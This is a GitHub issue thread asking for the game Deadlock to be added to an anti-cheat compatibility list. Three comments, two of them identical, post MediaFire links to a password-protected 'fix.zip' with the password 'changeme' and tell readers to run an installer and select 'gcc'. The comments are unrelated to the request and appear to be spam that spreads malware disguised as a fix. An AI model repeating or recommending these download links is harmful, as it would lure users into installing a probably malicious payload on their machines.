### ISSUE TITLE
Request Deadlock

### ISSUE THREAD

**Issue by Internetbestfriend** [AreWeAntiCheatYet/AreWeAntiCheatYet#1710]
### Game Title

Deadlock

### Game Website

https://store.steampowered.com/app/1422450/Deadlock/

### Anti-Cheat Software

VAC

### Status of the Anti-Cheat

⭐ Supported

### Proof of Mention

https://www.protondb.com/app/1422450

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
